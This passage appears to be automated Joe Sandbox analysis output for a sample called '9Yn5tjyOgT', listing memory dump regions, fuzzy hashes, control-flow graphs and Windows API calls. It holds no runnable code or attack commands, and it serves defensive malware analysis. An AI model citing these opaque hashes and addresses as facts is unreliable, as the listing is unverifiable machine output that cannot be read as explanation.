                                                                                                                    • Instruction Fuzzy Hash: 59417BB1E016188BEB58CF6BC9557C9FBF3AFC9300F14C0AAC50CA6265EB740A858F51
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.3433982988.0000000039580000.00000040.00000800.00020000.00000000.sdmp, Offset: 39580000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_39580000_9Yn5tjyOgT.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 08a9957ef02e00116cee8f284c4647a194eaf679c64779c9eac44059ed3855f9
                                                                                                                    • Instruction ID: 21b7934a276027801b8c372737bfd3c3521d9695fc25ab37ae917582a954e8f4
                                                                                                                    • Opcode Fuzzy Hash: 08a9957ef02e00116cee8f284c4647a194eaf679c64779c9eac44059ed3855f9
                                                                                                                    • Instruction Fuzzy Hash: E6415AB1E016588BEB58CF6BCD457CAFAF3AFC9310F14C1AAD50CA6264DB740A858F51

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    • GetCurrentProcess.KERNEL32 ref: 399D09FE
                                                                                                                    • GetCurrentThread.KERNEL32 ref: 399D0A3B
                                                                                                                    • GetCurrentProcess.KERNEL32 ref: 399D0A78
                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 399D0AD1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.3434097082.00000000399D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 399D0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_399d0000_9Yn5tjyOgT.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Current$ProcessThread
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2063062207-0
                                                                                                                    • Opcode ID: 7789fac053b08c0f048e09650b97c26b65a464eb95e39fe130d5b419bb76db37
                                                                                                                    • Instruction ID: 1ab7dbe761e0b276529003e9f078005a99890a94fa50aba828792157227054da
                                                                                                                    • Opcode Fuzzy Hash: 7789fac053b08c0f048e09650b97c26b65a464eb95e39fe130d5b419bb76db37
                                                                                                                    • Instruction Fuzzy Hash: 6F5133B0900349DFEB54DFA9C598BDEBBF1EB88300F248459E509A7361D738A941CF66

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    • GetCurrentProcess.KERNEL32 ref: 399D09FE
                                                                                                                    • GetCurrentThread.KERNEL32 ref: 399D0A3B
                                                                                                                    • GetCurrentProcess.KERNEL32 ref: 399D0A78
                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 399D0AD1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.3434097082.00000000399D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 399D0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_399d0000_9Yn5tjyOgT.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Current$ProcessThread
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2063062207-0
                                                                                                                    • Opcode ID: 33274a762f8cd7310fd88d3e60421c05b3837c65474dad9c603d8c76e3cea947
                                                                                                                    • Instruction ID: d218e817b745b71e802b7419e0140b254f91383d8ed6b8cd4141ed40c7d49516
                                                                                                                    • Opcode Fuzzy Hash: 33274a762f8cd7310fd88d3e60421c05b3837c65474dad9c603d8c76e3cea947
                                                                                                                    • Instruction Fuzzy Hash: 515133B0900349CFEB44DFA9C598BDEBBF1EB88300F248459E519A7260D738A941CF66

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 1731 399d0104-399d0176 1732 399d0178-399d017e 1731->1732 1733 399d0181-399d0188 1731->1733 1732->1733 1734 399d018a-399d0190 1733->1734 1735 399d0193-399d0232 CreateWindowExW 1733->1735 1734->1735 1737 399d023b-399d0273 1735->1737 1738 399d0234-399d023a 1735->1738 1742 399d0275-399d0278 1737->1742 1743 399d0280 1737->1743 1738->1737 1742->1743 1744 399d0281 1743->1744 1744->1744
                                                                                                                    APIs
                                                                                                                    • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 399D0222
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.3434097082.00000000399D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 399D0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_399d0000_9Yn5tjyOgT.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateWindow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 716092398-0
                                                                                                                    • Opcode ID: 5915675b2a5131a9ce6090519b6371b56e043263d697f4903af7622115925fc9
                                                                                                                    • Instruction ID: 4897132ce0b37d9135c8019711e23c0012c93632815db0a75f407a3f035f96a7
                                                                                                                    • Opcode Fuzzy Hash: 5915675b2a5131a9ce6090519b6371b56e043263d697f4903af7622115925fc9
                                                                                                                    • Instruction Fuzzy Hash: DC51C1B1D01349DFDB14CF99C984ADEBBB5FF49310F61812AE918AB210D774A885CF90

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 1745 399d0110-399d0176 1746 399d0178-399d017e 1745->1746 1747 399d0181-399d0188 1745->1747 1746->1747 1748 399d018a-399d0190 1747->1748 1749 399d0193-399d0232 CreateWindowExW 1747->1749 1748->1749 1751 399d023b-399d0273 1749->1751 1752 399d0234-399d023a 1749->1752 1756 399d0275-399d0278 1751->1756 1757 399d0280 1751->1757 1752->1751 1756->1757 1758 399d0281 1757->1758 1758->1758
                                                                                                                    APIs
                                                                                                                    • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 399D0222
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.3434097082.00000000399D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 399D0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_399d0000_9Yn5tjyOgT.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateWindow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 716092398-0
                                                                                                                    • Opcode ID: 6c22e3bc561e66121a244eddf4a14b83904a5ea9efed75de5f732ea721d6ba50
                                                                                                                    • Instruction ID: 6de97873d0c89995d4d29a489b9589065ed1eae00938869f02b3f104739e335f
                                                                                                                    • Opcode Fuzzy Hash: 6c22e3bc561e66121a244eddf4a14b83904a5ea9efed75de5f732ea721d6ba50
                                                                                                                    • Instruction Fuzzy Hash: B841C1B1D00349DFDB14CF99C894ADEBBB5FF49350F61812AE918AB210D774A845CF90

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 1759 399d1dc0-399d1dfc 1760 399d1eac-399d1ecc 1759->1760 1761 399d1e02-399d1e07 1759->1761 1767 399d1ecf-399d1edc 1760->1767 1762 399d1e09-399d1e40 1761->1762 1763 399d1e5a-399d1e92 CallWindowProcW 1761->1763 1770 399d1e49-399d1e58 1762->1770 1771 399d1e42-399d1e48 1762->1771 1765 399d1e9b-399d1eaa 1763->1765 1766 399d1e94-399d1e9a 1763->1766 1765->1767 1766->1765 1770->1767 1771->1770
                                                                                                                    APIs
                                                                                                                    • CallWindowProcW.USER32(?,?,?,?,?), ref: 399D1E81
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.3434097082.00000000399D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 399D0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_399d0000_9Yn5tjyOgT.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CallProcWindow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2714655100-0
                                                                                                                    • Opcode ID: ae9d08a6ae4b44393c39f66ee4b1f1fe5cae2b807990991b5d1e2580d08b6749
                                                                                                                    • Instruction ID: 5093b1f60c3d68444ceb5338bc26c2cd92398a15fc0fdcc4ab5d8b5ef2e3051f
                                                                                                                    • Opcode Fuzzy Hash: ae9d08a6ae4b44393c39f66ee4b1f1fe5cae2b807990991b5d1e2580d08b6749
                                                                                                                    • Instruction Fuzzy Hash: E84103B9A00349DFDB14CF99C884A9BBBF5FF98310F24C459E519AB321D734A841CBA1

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 1881 399d0bc0-399d0c5c DuplicateHandle 1882 399d0c5e-399d0c64 1881->1882 1883 399d0c65-399d0c82 1881->1883 1882->1883
                                                                                                                    APIs
                                                                                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 399D0C4F
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.3434097082.00000000399D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 399D0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_399d0000_9Yn5tjyOgT.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: DuplicateHandle
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3793708945-0
                                                                                                                    • Opcode ID: 9a42460273145571b0fda16bf9fed61cf8d6411e6acdcc5056ec4a0de29effab
                                                                                                                    • Instruction ID: 492f7bb182d50f8065fe96b98ffa990c52c22a249a381d69e661bc8abcb16274
                                                                                                                    • Opcode Fuzzy Hash: 9a42460273145571b0fda16bf9fed61cf8d6411e6acdcc5056ec4a0de29effab
                                                                                                                    • Instruction Fuzzy Hash: 8821E5B5900249EFDB10CFAAD584ADEBBF8EB48310F14841AE958A7310D378A940CFA5

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 1886 36b87c2c 1887 36b87ceb-36b87cfc 1886->1887 1888 36b87cfe 1887->1888 1889 36b87d03-36b87d0c 1887->1889 1888->1889 1891 36b87d12-36b87d25 1889->1891 1892 36b87ae3-36b87b08 1889->1892 1895 36b87d2c-36b87d47 1891->1895 1896 36b87d27 1891->1896 1893 36b87b0a 1892->1893 1894 36b87b0f-36b87b46 1892->1894 1893->1894 1905 36b87b48 1894->1905 1906 36b87b4d-36b87b7f 1894->1906 1897 36b87d49 1895->1897 1898 36b87d4e-36b87d62 1895->1898 1896->1895 1897->1898 1901 36b87d69-36b87d7f LdrInitializeThunk 1898->1901 1902 36b87d64 1898->1902 1904 36b87d81-36b87e7f 1901->1904 1902->1901 1909 36b87e81-36b87e86 call 36b81568 1904->1909 1910 36b87e87-36b87e91 1904->1910 1905->1906 1911 36b87b81-36b87ba6 1906->1911 1912 36b87be3-36b87bf6 1906->1912 1909->1910 1915 36b87ba8 1911->1915 1916 36b87bad-36b87bdb 1911->1916 1918 36b87bf8 1912->1918 1919 36b87bfd-36b87c22 1912->1919 1915->1916 1916->1912 1918->1919 1922 36b87c31-36b87c69 1919->1922 1923 36b87c24-36b87c25 1919->1923 1924 36b87c6b 1922->1924 1925 36b87c70-36b87cd1 call 36b87628 1922->1925 1923->1891 1924->1925 1931 36b87cd8-36b87cea 1925->1931 1932 36b87cd3 1925->1932 1931->1887 1932->1931
                                                                                                                    APIs
                                                                                                                    • LdrInitializeThunk.NTDLL(00000000), ref: 36B87D6E
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.3432402753.0000000036B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 36B80000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_36b80000_9Yn5tjyOgT.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: InitializeThunk
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2994545307-0
                                                                                                                    • Opcode ID: b4da46d525f6b6ddbf1eca43646c7770c203674b3b52b6f15fbd3ce02a584f2d
                                                                                                                    • Instruction ID: 03015172c234d96d553033ba869e544e43e6e92bfcd009e8260b48b88324009a
                                                                                                                    • Opcode Fuzzy Hash: b4da46d525f6b6ddbf1eca43646c7770c203674b3b52b6f15fbd3ce02a584f2d
                                                                                                                    • Instruction Fuzzy Hash: FD1142B4E402699FEB14CFE8D884EEDBBB5FB84319F248165E808A7241D7719D42CF50

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 1934 399d0bc8-399d0c5c DuplicateHandle 1935 399d0c5e-399d0c64 1934->1935 1936 399d0c65-399d0c82 1934->1936 1935->1936
                                                                                                                    APIs
                                                                                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 399D0C4F
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.3434097082.00000000399D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 399D0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_399d0000_9Yn5tjyOgT.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: DuplicateHandle
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3793708945-0
                                                                                                                    • Opcode ID: 0400893e4dd9168bf6d7ed5d7174899108dadd4fdebbf9cb7eb422a2e775cea1
                                                                                                                    • Instruction ID: 0d8af38272c65d774d6d38cb3673b0e2618f8e3059e80443d678aa162df4ea2c
                                                                                                                    • Opcode Fuzzy Hash: 0400893e4dd9168bf6d7ed5d7174899108dadd4fdebbf9cb7eb422a2e775cea1
                                                                                                                    • Instruction Fuzzy Hash: AF21E6B5900248DFDB10CFAAD584ADEBBF4EF48310F14841AE954A7310D378A940CF65

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 1950 399d2018-399d208a SetTimer 1952 399d208c-399d2092 1950->1952 1953 399d2093-399d20a7 1950->1953 1952->1953
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.3434097082.00000000399D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 399D0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_399d0000_9Yn5tjyOgT.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Timer
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2870079774-0
                                                                                                                    • Opcode ID: 06bb024b47646d3b33f93384621c0ca246f9d1ec954c708885956d4e1e4cbdd8
                                                                                                                    • Instruction ID: 521b98d2b558861ccb8d6a8f07b4b7b990fd6c64962ccf9567e82da9d97ba22c
                                                                                                                    • Opcode Fuzzy Hash: 06bb024b47646d3b33f93384621c0ca246f9d1ec954c708885956d4e1e4cbdd8
                                                                                                                    • Instruction Fuzzy Hash: 131103B5800349DFDB10CF9AD985BDEBBF8EB48320F108459E958A7210C375A984CFA5

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 1955 399dc560-399dd452 OleInitialize 1957 399dd45b-399dd478 1955->1957 1958 399dd454-399dd45a 1955->1958 1958->1957
                                                                                                                    APIs
                                                                                                                    • OleInitialize.OLE32(00000000), ref: 399DD445
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.3434097082.00000000399D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 399D0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_399d0000_9Yn5tjyOgT.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Initialize
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2538663250-0
                                                                                                                    • Opcode ID: ea99132ef8e9ac21569318a3b829840f90e803dbb0269bbc6558187f405ee1ed
                                                                                                                    • Instruction ID: 30287c18f63639ddf6df67f3dfa582f1c1a0de302a29c5de65079cc405231976
                                                                                                                    • Opcode Fuzzy Hash: ea99132ef8e9ac21569318a3b829840f90e803dbb0269bbc6558187f405ee1ed
                                                                                                                    • Instruction Fuzzy Hash: 5F1103B5904749CFDB10CFAAC585B9EBBF8EB48320F108459D618A7640C778A944CBA5
                                                                                                                    APIs
                                                                                                                    • DispatchMessageW.USER32(?,?,?,?,?,?,00000000,-00000018,?,399DD92F), ref: 399DE765
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.3434097082.00000000399D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 399D0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_399d0000_9Yn5tjyOgT.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: DispatchMessage
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2061451462-0
                                                                                                                    • Opcode ID: f7d63d4b2d001f2474b236ddd329fa87949f1439e2aba9a5c31dc8df2decabd7
                                                                                                                    • Instruction ID: 9c62028aaac8ae46ac94b52cd7bba8970f4c83741285cbb9080344be67d1bd8e
                                                                                                                    • Opcode Fuzzy Hash: f7d63d4b2d001f2474b236ddd329fa87949f1439e2aba9a5c31dc8df2decabd7
                                                                                                                    • Instruction Fuzzy Hash: D711EDB5D00749CFCB60CFAAD585BDEBBF4EB88314F10846AD458A7210C378A544CFA6
                                                                                                                    APIs
                                                                                                                    • DispatchMessageW.USER32(?,?,?,?,?,?,00000000,-00000018,?,399DD92F), ref: 399DE765
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.3434097082.00000000399D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 399D0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_399d0000_9Yn5tjyOgT.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: DispatchMessage
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2061451462-0
                                                                                                                    • Opcode ID: b2557d6728aaa339cbaf12c17ab2e94a4a94559d90265a1e24337a503d7d1302
                                                                                                                    • Instruction ID: 217c72fa6754b36cad54460686173f302dd405f01681908ababd68f4e222ce77
                                                                                                                    • Opcode Fuzzy Hash: b2557d6728aaa339cbaf12c17ab2e94a4a94559d90265a1e24337a503d7d1302
                                                                                                                    • Instruction Fuzzy Hash: 7611E0B5C04749DFDB50CF9AD584BDEBBF8EB48314F10845AE918A7210D378A544CFA5
                                                                                                                    APIs
                                                                                                                    • OleInitialize.OLE32(00000000), ref: 399DD445
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.3434097082.00000000399D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 399D0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_399d0000_9Yn5tjyOgT.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Initialize
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2538663250-0
                                                                                                                    • Opcode ID: d846a5346a21fa6cce57052a4a2b73cf0565d38db36f6577b4089cb5d44a382f
                                                                                                                    • Instruction ID: 15d0ddffe9b3c3c77a22584facbe9f18b21351ab0721f232e1848f930375b601
                                                                                                                    • Opcode Fuzzy Hash: d846a5346a21fa6cce57052a4a2b73cf0565d38db36f6577b4089cb5d44a382f
                                                                                                                    • Instruction Fuzzy Hash: DC1103B5900348CFDB20CFA9D585BDEBBF4EF88310F20845AD558A7650C378A544CFA5
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.3434097082.00000000399D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 399D0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_399d0000_9Yn5tjyOgT.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Timer
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2870079774-0
                                                                                                                    • Opcode ID: 2a36ee36655b2bdd3352a8ee8cd55f1f5b535d193fc3a66eac5e714be0a6f62d
                                                                                                                    • Instruction ID: 8302253eaa9a0038450799a9ce1728bcea50881a5fb6c1a51af7b201e0d56c73
                                                                                                                    • Opcode Fuzzy Hash: 2a36ee36655b2bdd3352a8ee8cd55f1f5b535d193fc3a66eac5e714be0a6f62d
                                                                                                                    • Instruction Fuzzy Hash: C911E5B5800349DFDB10CF9AD585BDEFBF8EB48320F108459E958A7210C375A544CFA5
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.3433982988.0000000039580000.00000040.00000800.00020000.00000000.sdmp, Offset: 39580000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_39580000_9Yn5tjyOgT.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: 6pS
                                                                                                                    • API String ID: 0-3518429112
                                                                                                                    • Opcode ID: f13e1c750fd0a0f1bbe578350f4942bbf30a7bc887e95053bdcf586e992b0761
                                                                                                                    • Instruction ID: 2cfa701ce8bdf1856d7546ec7d7ddfcbd323ed8626a366dec82d2ee07f0c3fd8
                                                                                                                    • Opcode Fuzzy Hash: f13e1c750fd0a0f1bbe578350f4942bbf30a7bc887e95053bdcf586e992b0761
                                                                                                                    • Instruction Fuzzy Hash: 07519275E01258CFDB54DFA9C890ADDBBB2FF89310F20816AD819AB365DB306946CF40
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.3433982988.0000000039580000.00000040.00000800.00020000.00000000.sdmp, Offset: 39580000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_39580000_9Yn5tjyOgT.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: 6dV
                                                                                                                    • API String ID: 0-3085830225
                                                                                                                    • Opcode ID: f6d25a7255547c998a926a655bc42e9c78183e3987c20471ae630ddd2ef9cec8
                                                                                                                    • Instruction ID: ce20bd211c259310b6b6454b0ea085779d75c675c1311a17d3e46f0c635da9c3
                                                                                                                    • Opcode Fuzzy Hash: f6d25a7255547c998a926a655bc42e9c78183e3987c20471ae630ddd2ef9cec8
                                                                                                                    • Instruction Fuzzy Hash: 35E04671418E42EFF3211F20ACAC2AA3B70FB0B317B842D59E80E96422C7780040CB01
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.3405528588.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_150000_9Yn5tjyOgT.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 460350e00e5ee819dafd7f893ef049997badb40d00c99b26c7c10bb36302f7e8
                                                                                                                    • Instruction ID: 74c1d4d9407b38b4c829c663921aff1adb3c328a33337a1a276649347b58186a
                                                                                                                    • Opcode Fuzzy Hash: 460350e00e5ee819dafd7f893ef049997badb40d00c99b26c7c10bb36302f7e8
                                                                                                                    • Instruction Fuzzy Hash: 7852FD34A00218CFEF24DBA4C861BAEBB76EF89301F1080A9D51A7B395DB355E85DF51
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.3405528588.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_150000_9Yn5tjyOgT.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 0aa4abebaa05fca4746b120239f0798a9e2718cdb8715156f7edfc635f4caa4e
                                                                                                                    • Instruction ID: 71dfe5461b07c59308ddb76c233743e0afe9405f736d3c7050f420b3b602803d
                                                                                                                    • Opcode Fuzzy Hash: 0aa4abebaa05fca4746b120239f0798a9e2718cdb8715156f7edfc635f4caa4e
                                                                                                                    • Instruction Fuzzy Hash: AE42DAA7E1D3E18FC7124B705CB82597FB17B22206BDE459EC8C297287EBA54445C352
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.3405528588.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_150000_9Yn5tjyOgT.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 42c8e109682daa926ed825571bb0eca286a9425e37076cec6c6f71f26509793f
                                                                                                                    • Instruction ID: a291cdb4c796cea984dfe76dab9e8ecd89ef5d28c6960b80682f60de98a84872
                                                                                                                    • Opcode Fuzzy Hash: 42c8e109682daa926ed825571bb0eca286a9425e37076cec6c6f71f26509793f
                                                                                                                    • Instruction Fuzzy Hash: DC127930A00209DFCB14CF69D894AAEBBF2FF48315F548569E869DB261DB30ED45CB90
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.3405528588.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_150000_9Yn5tjyOgT.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: a8f5909087953178846ccc76eb20afca959ee21c167e31f0611527de94889eca
                                                                                                                    • Instruction ID: 1d37fd81cb9c2813a8348a0e43802a17ffa409889f02312c9a320c2b8c16958d
                                                                                                                    • Opcode Fuzzy Hash: a8f5909087953178846ccc76eb20afca959ee21c167e31f0611527de94889eca
                                                                                                                    • Instruction Fuzzy Hash: 92B1AE30304610CFDB159F39C864B6E7BF2AF89316F15856AE816CF2A5DB748C89CB91
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.3433982988.0000000039580000.00000040.00000800.00020000.00000000.sdmp, Offset: 39580000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_39580000_9Yn5tjyOgT.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: fb3d409a4b8be63e9be364a312ea2b910fbe962d95edccec2a40cdabc468bfff
                                                                                                                    • Instruction ID: 38b3e56225f06420346fedfcffbe322dd2a9b0d2495f43eac7d7a09ea5973de7
                                                                                                                    • Opcode Fuzzy Hash: fb3d409a4b8be63e9be364a312ea2b910fbe962d95edccec2a40cdabc468bfff
                                                                                                                    • Instruction Fuzzy Hash: AEE1E374A44258DFDB25DF60C855BADBBB2FB89301F1084AAD909B7391CB355E82CF50
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.3433982988.0000000039580000.00000040.00000800.00020000.00000000.sdmp, Offset: 39580000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_39580000_9Yn5tjyOgT.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: b1e03179ae69f31430df7d8445ea5aed7ec796c134f27209c546241a1200a497
                                                                                                                    • Instruction ID: 63593c31b29230446a2941b1450f07b18d85dfed0e069eb34cc1f18dd1a296b0
                                                                                                                    • Opcode Fuzzy Hash: b1e03179ae69f31430df7d8445ea5aed7ec796c134f27209c546241a1200a497
                                                                                                                    • Instruction Fuzzy Hash: C9E1F474A40258DFDB25DF60C855BADBBB2FB89301F1084AAD909B7391CB355E82CF50
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.3405528588.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_150000_9Yn5tjyOgT.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 3e2942ab13d23362148fb48b9f3dc0dd4f55184fefe99fe8d03f7c1b9478995e
                                                                                                                    • Instruction ID: c00a51053cf0b8a2759dd219e8f20ad59eff36785d899ddc2426010fe0329be1
                                                                                                                    • Opcode Fuzzy Hash: 3e2942ab13d23362148fb48b9f3dc0dd4f55184fefe99fe8d03f7c1b9478995e
                                                                                                                    • Instruction Fuzzy Hash: 0C81A030B00945CFCB18CF69C8A49AAB7B3BF88316B658069D825DF365E731EC45CB50
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.3405528588.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_150000_9Yn5tjyOgT.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
